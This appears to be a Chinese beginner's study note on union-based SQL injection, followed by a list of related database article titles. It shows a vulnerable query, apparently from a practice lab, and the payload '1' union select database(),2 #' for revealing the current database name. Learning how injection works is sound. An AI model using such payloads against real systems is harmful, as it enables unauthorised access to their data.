5.sql injection之获取当前数据库-------小白笔记
2023-09-27 14:28:02 时间
1.利用联合查询,查询数据库名称:
①database()函数,显示当前所连接的数据库名称
2.查询过程:
①源码:SELECT first_name, last_name FROM users WHERE user_id = '$id'
②构造语句:1' union select database(),2 #
③真正执行的语句:SELECT first_name, last_name FROM users WHERE user_id = ’ 1' union select database(),2 # ’
3.构造语句的实质:
就是给$id赋值为:1 union select database(),2 #
相关文章
- 12.PHP_PDO数据库抽象层
- 数据库的读写分离(Amoeba)
- 深入了解SQL Server数据库的线程与纤程
- 三万字把SQL数据库的所有命令,函数,运算符讲得明明白白讲解,内容实在丰富
- SQL SEVER 2008中的演示样例数据库
- 数据库同步,发布订阅报错,对路径“C:Program FilesMicrosoft SQL Server…… 的访问被拒绝。
- 将数据库字段从float修改为decimal
- SQL Server 2008 转换为 SQL 2005 数据库 脚本生成方式(解决主键、索引、标识等数据库约束丢失)
- Oracle数据库:刷题错题本,数据库的各种概念
- Python:利用pymssql模块操作SQL server数据库
- 非常规方法,轻松应对Oracle数据库危急异常
- 第四章——数据库的安全性
- vim如何自动更新cscope数据库?
- 《SQL初学者指南(第2版)》第1章 关系型数据库和SQL
- 《SQL初学者指南》——第1章 关系型数据库和SQL
- 转 shell模拟数据库的读写
- 一次数据库优化的对话
- Java学习-057-Jsoup爬虫获取中国所有的三级行政区划数据(二),并生成数据库 SQL 脚本插入语句
- SQL server 数据库关系图无法打开 解决办法
- 数据库SQL优化大总结之 百万级数据库优化方案
- MySQL数据库的高可用方案总结
- 项目经验——Sql server 数据库的备份和还原____还原数据库提示“介质集有2个介质簇,但只提供了1个。必须提供所有成员” .
- 超过6000台Redis数据库被恶意程序感染
- [置顶] 数据库优化实践【MS SQL优化开篇】
- 用户管理模块数据库设计
- 查看SQL SERVER数据库的连接数
- sql server登录名、服务器角色、数据库用户、数据库角色、架构区别联系
- 美团图数据库平台建设及业务实践,亿万级数据下的技术选型及对比
- SQL Server 生成 数据字典 / 数据库文档
- 高性能时序数据库 HiTSDB 启动公测,为物联网而生的数据库!